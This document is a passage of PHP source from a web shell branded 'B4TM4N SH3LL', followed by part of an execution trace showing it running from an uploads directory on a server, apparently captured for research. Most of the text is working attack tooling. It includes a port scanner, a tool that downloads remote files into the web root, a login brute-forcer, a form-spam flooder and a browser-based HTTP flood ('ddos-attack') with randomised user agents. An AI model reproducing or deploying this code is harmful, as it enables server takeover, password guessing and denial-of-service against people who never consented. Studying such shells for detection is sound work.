Name</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Timezone</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Zip</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Status</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<iframe src='%s' width='100%%' height='345' frameBorder='0'><iframe>", $json['as'], $json['city'], $json['country'], $json['countryCode'], $json['isp'], $json['lat'], $json['lon'], $json['org'], $json['query'], $json['region'], $json['regionName'], $json['timezone'], $json['zip'], $json['status'], $url);
exit;
}
}
if ($z == "port-scanner") {
print "<div class='tools-header'>\r\n\t\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t\t </div>";
printf("<div id='port-scan'>\r\n\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t<label>Host Port</label><input type='text' id='ip-port' value='%s'/><br>\r\n\t\t\t\t\t\t<label>Start Port</label><input type='text' id='start-port' value='1'/><br>\r\n\t\t\t\t\t\t<label>End Port</label><input type='text' id='end-port' value='65535'/><br>\r\n\t\t\t\t\t\t<label>Methode</label><select id='scan-port'><option value='1'>socket_connect</option><option value='2'>fsockopen</option></select><br>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value);\" value=Scan />\r\n\t\t\t\t\t\t<input type='submit' onclick=\"return ajaxAbort(true,'port-result')\" value=Cancel />\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div id='port-result' class='result'></div>", gethostbyname(http_host));
if (any("x", $_REQUEST) && $_REQUEST['x'] == "scan-port") {
ob_clean();
$host = $_REQUEST['ip'];
$from = $_REQUEST['sp'];
$to = $_REQUEST['ep'];
$mtd = $_REQUEST['mtd'];
switch ($mtd) {
case '1':
if (function_exists('socket_create')) {
$socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
for ($conn_port = $from; $conn_port <= $to; $conn_port++) {
$conn = @socket_connect($socket, $host, $conn_port);
if ($conn) {
print "<br>port {$conn_port} open";
socket_close($socket);
$socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
}
}
} else {
print "Error socket_connect<br>";
}
break;
case '2':
for ($conn_port = $from; $conn_port <= $to; $conn_port++) {
$conn = @fsockopen($host, $conn_port);
if ($conn) {
print "<br>port {$conn_port} open";
fclose($conn);
}
}
break;
}
print "<br>Scan Finish.";
exit;
}
}
if ($z == "script-loader") {
print "<div class='tools-header'>\r\n\t\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t\t </div>";
$path = "/var/www/htmlDIRECTORY_SEPARATORscript-loader";
if (!is_dir($path)) {
mkdir($path, 0755);
}
$recur = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::LEAVES_ONLY);
$result = "";
foreach ($recur as $key => $val) {
if (basename($key) != ".." && basename($key) != ".") {
$result .= sprintf("<tr>\r\n\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t<td><a href='%s' target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t<td><center>%s</center></td>\r\n\t\t\t\t\t\t</tr>", GetUrlFromPath(realpath($key)), basename(realpath($key)), GetFileTime(realpath($key), 'modify'));
}
}
printf("<div id='script-loader'>\r\n\t\t\t\t\t<div class='divide'>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t\t\t<label>Url</label><input type='text' id='url-source' value=''/><br>\r\n\t\t\t\t\t\t\t\t<label>Filename</label><input type='text' id='file-name' value=''/><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' onclick=\"return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value);\"/><br>\r\n\t\t\t\t\t\t\t\t<div id='download-result' class='result'></div>\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t\t<legend>List's</legend>\r\n\t\t\t\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t\t<thead><tr><th>No.</th><th>Name</th><th>Modified</th>\r\n\t\t\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>", $result);
if (any("url", $_REQUEST) && any("filename", $_REQUEST)) {
ob_clean();
$url = $_REQUEST['url'];
$filename = $_REQUEST['filename'];
$dest = rtrim($path, _) . _ . $filename;
if (GetUrlExists($url) && !empty($filename)) {
if (GetDownloadUrl($url, $dest)) {
$url = GetUrlFromPath($dest);
printf("Success -> <a href='{$url}' target='_blank'><u>Link</u></a>");
} else {
print "<br>Failed";
}
print "<br>Finish";
} else {
print "<br>Mistakes";
}
exit;
}
}
if ($z == "encryptor") {
print "<div class='tools-header'>\r\n\t\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t\t </div>";
printf("<div id='script-loader'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<div class='hash-control'>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='basic' checked><label>Basic</label>\r\n\t\t\t\t\t\t<select id='basic-hash'>\r\n\t\t\t\t\t\t\t<option value='md5'>Md5</option>\r\n\t\t\t\t\t\t\t<option value='asc'>Char</option>\r\n\t\t\t\t\t\t\t<option value='chr'>Ascii</option>\r\n\t\t\t\t\t\t\t<option value='sha1'>Sha1</option>\r\n\t\t\t\t\t\t\t<option value='crc32'>Crc32</option>\r\n\t\t\t\t\t\t\t<option value='B64E'>B64E</option>\r\n\t\t\t\t\t\t\t<option value='B64D'>B64D</option>\r\n\t\t\t\t\t\t\t<option value='urlencode'>URL Encode</option>\r\n\t\t\t\t\t\t\t<option value='urldecode'>URL Decode</option>\r\n\t\t\t\t\t\t\t<option value='strlen'>String Length</option>\r\n\t\t\t\t\t\t\t<option value='strrev'>String Reverse</option>\r\n\t\t\t\t\t\t\t<option value='base64_encode'>Base64 Encode</option>\r\n\t\t\t\t\t\t\t<option value='base64_decode'>Base64 Decode</option>\r\n\t\t\t\t\t\t\t<option value='entties'>Htmlentities</option>\r\n\t\t\t\t\t\t\t<option value='spechar'>Htmlspecialchars</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='extra'><label>Extra</label>\r\n\t\t\t\t\t\t<select id='extra-hash'>\r\n\t\t\t\t\t\t\t<option value='asc-hex'>Ascii => Hex</option>\r\n\t\t\t\t\t\t\t<option value='asc-bin'>Ascii => Binary</option>\r\n\t\t\t\t\t\t\t<option value='hex-asc'>Hex => Ascii</option>\r\n\t\t\t\t\t\t\t<option value='hex-bin'>Hex => Binary</option>\r\n\t\t\t\t\t\t\t<option value='bin-asc'>Binary => Ascii</option>\r\n\t\t\t\t\t\t\t<option value='bin-hex'>Binary => Hex</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='crypt'><label>Crypt</label>\r\n\t\t\t\t\t\t<input type='text' id='crypt-salt' name='salt' placeholder='\$alt'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='hash'><label>Hash</label>\r\n\t\t\t\t\t\t<select id='hash-hash'><option value='md2'>md2</option><option value='md4'>md4</option><option value='md5'>md5</option><option value='sha1'>sha1</option><option value='sha256'>sha256</option><option value='sha384'>sha384</option><option value='sha512'>sha512</option><option value='ripemd128'>ripemd128</option><option value='ripemd160'>ripemd160</option><option value='ripemd256'>ripemd256</option><option value='ripemd320'>ripemd320</option><option value='whirlpool'>whirlpool</option><option value='tiger128,3'>tiger128,3</option><option value='tiger160,3'>tiger160,3</option><option value='tiger192,3'>tiger192,3</option><option value='tiger128,4'>tiger128,4</option><option value='tiger160,4'>tiger160,4</option><option value='tiger192,4'>tiger192,4</option><option value='snefru'>snefru</option><option value='gost'>gost</option><option value='adler32'>adler32</option><option value='crc32'>crc32</option><option value='crc32b'>crc32b</option><option value='haval128,3'>haval128,3</option><option value='haval160,3'>haval160,3</option><option value='haval192,3'>haval192,3</option><option value='haval224,3'>haval224,3</option><option value='haval256,3'>haval256,3</option><option value='haval128,4'>haval128,4</option><option value='haval160,4'>haval160,4</option><option value='haval192,4'>haval192,4</option><option value='haval224,4'>haval224,4</option><option value='haval256,4'>haval256,4</option><option value='haval128,5'>haval128,5</option><option value='haval160,5'>haval160,5</option><option value='haval192,5'>haval192,5</option><option value='haval224,5'>haval224,5</option><option value='haval256,5'>haval256,5</option></select>\r\n\t\t\t\t\t\t<input type='checkbox' id='hash-raw'/> Raw\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"\r\n\t\t\t\t\t\turl='';\r\n\t\t\t\t\t\ttextencode=window.btoa(document.getElementById('hashtext').value);\r\n\t\t\t\t\t\tradios=document.getElementsByName('encr');\r\n\t\t\t\t\t\tfor(var i=0,length=radios.length;i<length;i++){\r\n\t\t\t\t\t\t\tif (radios[i].checked){\r\n\t\t\t\t\t\t\t\tswitch(radios[i].value){\r\n\t\t\t\t\t\t\t\t\tcase 'basic':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=basic&hash='+document.getElementById('basic-hash').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'extra':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=extra&hash='+document.getElementById('extra-hash').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'crypt':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=crypt&salt='+document.getElementById('crypt-salt').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'hash':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=hash&hash='+document.getElementById('hash-hash').value+'&raw='+document.getElementById('hash-raw').checked+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\treturn getAjax(false,'hashresult','POST',url);\r\n\t\t\t\t\t\t\"/>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"\r\n\t\t\t\t\t\t\ttempi=document.getElementById('hashresult').value;\r\n\t\t\t\t\t\t\ttempi1=document.getElementById('hashtext').value;\r\n\t\t\t\t\t\t\tdocument.getElementById('hashtext').value=tempi.trim();\r\n\t\t\t\t\t\t\tdocument.getElementById('hashresult').value=tempi1.trim();\r\n\t\t\t\t\t\t\" value='Swap'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='hash-capture'>\r\n\t\t\t\t\t<div class='hash-capture-left'>\r\n\t\t\t\t\t\t<label>String</label><textarea id='hashtext'></textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"\r\n\t\t\t\t\t\t\tdocument.getElementById('hashtext').value='';\r\n\t\t\t\t\t\t\" value='Clear'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash-capture-right'>\r\n\t\t\t\t\t\t<label>Result</label><textarea id='hashresult'></textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"\r\n\t\t\t\t\t\t\tdocument.getElementById('hashresult').value='';\r\n\t\t\t\t\t\t\" value='Clear'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t</form>\r\n\t\t</div>");
function chr_asc($str)
{
$asc = '';
for ($i = 0; $i < strlen($str); $i++) {
$asc .= ord($str[$i]) . ' ';
}
return rtrim($asc);
}
function asc_chr($asc)
{
$str = '';
if (strpos($asc, ' ')) {
$exps = explode(' ', $asc);
foreach ($exps as $exp) {
$str .= chr($exp);
}
} else {
$str = chr($asc);
}
return $str;
}
function asc_hex($asc)
{
$hex = '';
for ($i = 0; $i < strlen($asc); $i++) {
$hex .= sprintf("%02x", ord(substr($asc, $i, 1)));
}
return $hex;
}
function hex_asc($hex)
{
$asc = '';
for ($i = 0; $i < strlen($hex); $i += 2) {
$asc .= chr(hexdec(substr($hex, $i, 2)));
}
return $asc;
}
function hex_bin($hex)
{
$bin = '';
for ($i = 0; $i < strlen($hex); $i++) {
$bin .= str_pad(decbin(hexdec($hex[$i])), 4, '0', STR_PAD_LEFT);
}
return $bin;
}
function bin_hex($bin)
{
$hex = '';
for ($i = strlen($bin) - 4; $i >= 0; $i -= 4) {
$hex .= dechex(bindec(substr($bin, $i, 4)));
}
return strrev($hex);
}
function asc_bin($asc)
{
$hex = asc_hex($asc);
return hex_bin($hex);
}
function bin_asc($bin)
{
$hex = bin_hex($bin);
return hex_asc($hex);
}
if (any("opt", $_REQUEST)) {
ob_clean();
$opt = $_REQUEST['opt'];
$_a = "b";
$_b = "a";
$_c = "s";
$_d = "e";
$_e = "6";
$_f = "4";
$_g = "_";
$_h = "e";
$_i = "n";
$_j = "c";
$_k = "o";
$_l = "d";
$_m = "e";
$b64e = "base64_encode";
$b64d = "base64_decode";
$text = base64_decode($_POST['text-encode']);
if ($opt == 'basic') {
$hash = $_REQUEST['hash'];
switch ($hash) {
case "md5":
print md5($text);
break;
case "sha1":
print sha1($text);
break;
case "chr":
print asc_chr($text);
break;
case "asc":
print chr_asc($text);
break;
case "crc32":
print crc32($text);
break;
case "strlen":
print strlen($text);
break;
case "strrev":
print strrev($text);
break;
case "urlencode":
print urlencode($text);
break;
case "urldecode":
print urldecode($text);
break;
case "entties":
print htmlentities($text);
break;
case "spechar":
print htmlspecialchars($text);
break;
case "base64_encode":
print $b64e($text);
break;
case "base64_decode":
print $b64d($text);
break;
case "B64E":
print B64E($text);
break;
case "B64D":
print B64D($text);
break;
}
} elseif ($opt == 'extra') {
$hash = $_REQUEST['hash'];
switch ($hash) {
case "chr-asc":
print str_asc($text);
break;
case "asc-chr":
print asc_str($text);
break;
case "asc-hex":
print asc_hex($text);
break;
case "hex-asc":
print hex_asc($text);
break;
case "hex-bin":
print hex_bin($text);
break;
case "bin-hex":
print bin_hex($text);
break;
case "asc-bin":
print asc_bin($text);
break;
case "bin-asc":
print bin_asc($text);
break;
}
} elseif ($opt == 'crypt') {
$salt = $_REQUEST['salt'];
print crypt($text, $salt);
} elseif ($opt == 'hash') {
$hash = $_REQUEST['hash'];
$raw = $_REQUEST['raw'];
if ($raw == true) {
print hash($hash, $text, true);
} else {
print hash($hash, $text);
}
}
exit;
}
}
if ($z == "form-bruteforces") {
print "<div class='tools-header'>\r\n\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t </div>";
$exp = array('{', '"name":"Handsome",', '"email":"very@handsome.com",', '"subject":"WHOOPS YOU GOT E-MAIL ?!",', '"message":"HA HA HA HA HA HA HA HA",', '}');
printf("<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t<label>Url Action</label><input type='text' id='form-url' placeholder='http://'/><br>\r\n\t\t\t\t\t\t<label>Count's</label><input type='number' id='form-count' value='100' min='10' autocomplete='off'/><br>\r\n\t\t\t\t\t\t<label>Parameter (JSON)</label>\r\n\t\t\t\t\t\t<textarea id='form-parameter'>%s</textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\"return ajaxAbort(true,'form-result')\" value=Cancel />\r\n\t\t\t\t\t\t<input type='submit' value='Attack' onclick=\"return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value);\"/><br>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t\t<div id='form-result' class='result'></div>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t</div>", "{\n\"name\":\"Handsome\",\n\"email\":\"very@handsome.com\",\n\"subject\":\"WHOOPS YOU GOT E-MAIL ?!\",\n\"message\":\"HA HA HA HA HA HA HA HA\",\n}");
if (any("url", $_REQUEST) && any("parameter", $_REQUEST)) {
ob_clean();
$start = $succ = $fail = 0;
$url = $_REQUEST['url'];
$count = $_REQUEST['count'];
$parameter = $_REQUEST['parameter'];
$content = json_decode($parameter, true);
if (!is_array($content)) {
$content = array();
}
do {
$start++;
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($content));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (curl_error($ch)) {
echo curl_error($ch);
}
curl_close($ch);
if ($httpcode == 200) {
$succ++;
} else {
$fail++;
}
if ($start == $count) {
echo "Success: {$succ}<br>Failed: {$fail}<br>Messages: " . htmlspecialchars($result);
}
} while ($start <= $count);
exit;
}
}
if ($z == "login-bruteforces") {
print "<div class='tools-header'>\r\n\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t </div>";
printf("<div id='login-bruteforces'>\r\n\t\t\t<div class='divide-left'>\r\n\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t<label>Url Action</label><input type='text' id='login-url' placeholder='http://'/><br>\r\n\t\t\t\t\t<label>User List</label><input type='text' id='login-user' placeholder='admin' value='admin'/><br>\r\n\t\t\t\t\t<label> </label><input type='text' id='login-username' placeholder='User Fieldname'/><br>\r\n\t\t\t\t\t<label>Pass List</label><input type='text' id='login-passlist' placeholder='http://'/><br>\r\n\t\t\t\t\t<label> </label><input type='text' id='login-passname' placeholder='Pass Fieldname'/><br>\r\n\t\t\t\t\t<input type='submit' onclick=\"return getAjax(true,'login-result','POST',\r\n\t\t\t\t\t'?z=login-bruteforces'+\r\n\t\t\t\t\t'&url='+document.getElementById('login-url').value+\r\n\t\t\t\t\t'&user='+document.getElementById('login-user').value+\r\n\t\t\t\t\t'&userfield='+document.getElementById('login-username').value+\r\n\t\t\t\t\t'&passfield='+document.getElementById('login-passname').value+\r\n\t\t\t\t\t'&passlist='+document.getElementById('login-passlist').value);\"/><br>\r\n\t\t\t\t</form>\r\n\t\t\t</div>\r\n\t\t\t<div class='divide-right'>\r\n\t\t\t\t<fieldset>\r\n\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t<div id='login-result' class='result'></div>\r\n\t\t\t\t</fieldset>\r\n\t\t\t</div>\r\n\t\t</div>");
if (any("url", $_REQUEST) && any("user", $_REQUEST)) {
ob_clean();
$url = $_REQUEST['url'];
$user = $_REQUEST['user'];
$file = GetUrlExists($_REQUEST['passlist']) ? GetUrlContent($_REQUEST['passlist']) : $_REQUEST['passlist'];
$words = explode("\n", $file);
$length = count($words);
foreach ($words as $index => $word) {
$parameter = http_build_query(array($_REQUEST['userfield'] => $user, $_REQUEST['passfield'] => $word, 'Submit' => 'Submit'));
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_POSTFIELDS, $parameter);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ra = curl_exec($ch);
$st = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (curl_error($ch)) {
echo curl_error($ch);
}
curl_close($ch);
if ($st == 200) {
echo "FOUND'S: {$user}:{$word}<br>";
exit;
} else {
echo htmlspecialchars($ra);
}
}
exit;
}
}
if ($z == "mass-tools") {
print "<div class='tools-header'>\r\n\t\t\t <h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t <h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t </div>";
print "Coming Soon";
}
if ($z == "ddos-attack") {
print "<div class='tools-header'>\r\n\t\t\t<h3>" . $menu_tools[$z]['title'] . " v" . $menu_tools[$z]['ver'] . "</h3>\r\n\t\t\t<h3> by: " . $menu_tools[$z]['auth'] . "</h3>\r\n\t\t </div>";
printf('<script type="text/javascript">
window.onload=function(){
startTime();
var interval;
var xhttp;
var requestsNode=document.getElementById("requests"),
successNode=document.getElementById("success"),
proccessNode=document.getElementById("proccess"),
targetNode=document.getElementById("target"),
attack=document.getElementById("attack"),
method=document.getElementById("method"),
size=document.getElementById("size"),
time=document.getElementById("time"),
stamp=document.getElementById("stamp")
uagent=document.getElementById("uagent")
referer=document.getElementById("referer")
origin=document.getElementById("origin")
var requests=0,
succeeded=0,
proccess=0;
var makeHttpRequest=function(){
var data=new FormData();
var buff=new ArrayBuffer(65536);
var xhrx=new XMLHttpRequest();
var agent =["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"];
randomize=function(arr){
rand=Math.floor((Math.random()*arr.length));
return arr[rand];}
xhrx.open(method.value,targetNode.value,true);
if (uagent.checked) xhrx.setRequestHeader("user-agent",randomize(agent));
if (referer.checked) xhrx.setRequestHeader("referer",targetNode.value);
if (origin.checked) xhrx.setRequestHeader("origin","*");
xhrx.onreadystatechange=function(){
if(xhrx.readyState==XMLHttpRequest.DONE){
if(xhrx.status>=500){
onSuccess();
}
onProcess();
}
onRequest();
}
xhttp=xhrx;
attack=function(){
str="";arr=new Uint32Array(buff);
window.crypto.getRandomValues(arr);
for(var i=0;i<arr.length;i++){
str+=String.fromCharCode(arr[i]);
}return str;}
what=attack();
for(var j=0;j<size.value;j++){
data.append(what, stamp.value);}
xhrx.send(data);
};
var onRequest=function(){
requests++;
requestsNode.innerHTML=requests;
};
var onProcess=function(){
proccess++;
proccessNode.innerHTML=proccess;
};
var onSuccess=function(){
success++;
successNode.innerHTML=success;
};
attack.onclick=function(){
var today=new Date();
var h=today.getHours();
var m=today.getMinutes();
var s=today.getSeconds();
m=m<10?"0"+m:m;
s=s<10?"0"+s:s;
if(this.value==\'Start\'){
this.value="Stop";
requests=0;
succeeded=0;
proccess=0;
document.getElementById("start").innerHTML="00:00:00";
document.getElementById("finish").innerHTML="00:00:00";
interval=setInterval(makeHttpRequest,(parseInt(time.value)));
document.getElementById("start").innerHTML=h+":"+m+":"+s;
}else if(this.value==\'Stop\'){
this.value="Start";
xhttp.abort();
clearInterval(interval);
document.getElementById("finish").innerHTML=h+":"+m+":"+s;
}
};
function startTime(){
var today=new Date();
var h=today.getHours();
var m=today.getMinutes();
var s=today.getSeconds();
m=m<10?"0"+m:m;
s=s<10?"0"+s:s;
document.getElementById("times").innerHTML=h+":"+m+":"+s;
var t=setTimeout(startTime,500);
}
}
</script>
<form onsubmit="return false;" class="new">
<label>Target</label><input type="text" id="target" value="http://www.target.com"><br>
<label>Stamp</label><input type="text" id="stamp" value="DDOS ATTACK !!!"><br>
<label>Method</label><select id="method">
<option value="PUT">PUT</option>
<option value="GET">GET</option>
<option value="POST">POST</option>
<option value="HEAD">HEAD</option>
<option value="TRACE">TRACE</option>
<option value="PATCH">PATCH</option>
<option value="OPTIONS">GET</option>
<option value="DELETE">DELETE</option>
<option value="CONNECT">CONNECT</option>
<option value="OPTIONS">OPTIONS</option>
</select><br>
<label>Size (kB)</label><input type="number" id="size" value="1024"><br>
<label>Time (ms)</label><input type="number" id="time" value="500"><br>
<label>Options</label>
<input type="checkbox" id="uagent" name="uagent" style="vertical-align:middle"> User Agent
<input type="checkbox" id="referer" name="referer" style="vertical-align:middle"> Referer Target
<input type="checkbox" id="origin" name="origin" style="vertical-align:middle"> Origin<br>
<label style="margin:5px 0px 5px">
Time <span id="times">00:00:00</span> |
Start <span id="start">00:00:00</span> |
Finish <span id="finish">00:00:00</span>
</label><br>
<label style="margin:0px 0px 5px">
Requests <span id="requests">0</span> |
Proccess <span id="proccess">0</span> |
Success <span id="success">0</span>
</label><br>
<input type="submit" id="attack" value="Start"/>
</form>');
}
print "</div>";
}
/* END CUSTOM TOOLZ */
printf("</div><!-- content -->\r\n\t\t</div><!-- container -->\r\n\t\t\t<div id='footer'>\r\n\t\t\t\t<div id='copyrights'><a href='//github.com/k4mpr3t/b4tm4n'>k4mpr3t</a> © %s</div>\r\n\t\t\t\t<div id='pageload'>Page Loaded in %s Seconds</div>\r\n\t\t\t</div>\r\n\t\t</body>\r\n\t\t</html>", date('Y'), round(microtime(true) - $start, 2));
}Execution traces
data/traces/5d64dbfacb0a98e75c75f8c9dd47613c_trace-1676262562.3636.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:29:48.261445]
1 0 1 0.000139 393512
1 3 0 0.003389 1089368 {main} 1 /var/www/html/uploads/bat.php 0 0
1 A /var/www/html/uploads/bat.php 23 $x_ = 'zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a'
1 A /var/www/html/uploads/bat.php 34 $config = ['title' => 'B4TM4N SH3LL', 'subtitle' => 'V3RS10N 2.7 ~ k4mpr3t', 'themes' => 'br34k', 'debug' => FALSE]
2 4 0 0.003469 1089368 explode 0 /var/www/html/uploads/bat.php 40 2 ':' 'zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a'
2 4 1 0.003487 1089936
2 4 R [0 => 'zaIgxSRawZ==', 1 => '42b378d7eb719b4ad9c908601bdf290d541c9c3a']
1 A /var/www/html/uploads/bat.php 40 $account = [0 => 'zaIgxSRawZ==', 1 => '42b378d7eb719b4ad9c908601bdf290d541c9c3a']
2 5 0 0.003522 1089864 session_start 0 /var/www/html/uploads/bat.php 42 0
2 5 1 0.003590 1090616
2 5 R TRUE
2 6 0 0.003607 1090616 define 0 /var/www/html/uploads/bat.php 59 2 '_' '/'
2 6 1 0.003621 1090720
2 6 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'HTTP_HOST'
2 7 0 0.003646 1090648 strtolower 0 /var/www/html/uploads/bat.php 63 1 'HTTP_HOST'
2 7 1 0.003660 1090720
2 7 R 'http_host'
2 8 0 0.003674 1090688 define 0 /var/www/html/uploads/bat.php 63 2 'http_host' 'localhost'
2 8 1 0.003688 1090792
2 8 R TRUE
1 A /var/www/html/uploads/bat.php 61 $k = 'HTTP_USER_AGENT'
2 9 0 0.003712 1090720 strtolower 0 /var/www/html/uploads/bat.php 63 1 'HTTP_USER_AGENT'
2 9 1 0.003725 1090792
2 9 R 'http_user_agent'
2 10 0 0.003739 1090760 define 0 /var/www/html/uploads/bat.php 63 2 'http_user_agent' 'python-requests/2.25.1'
2 10 1 0.003753 1090864
2 10 R TRUE
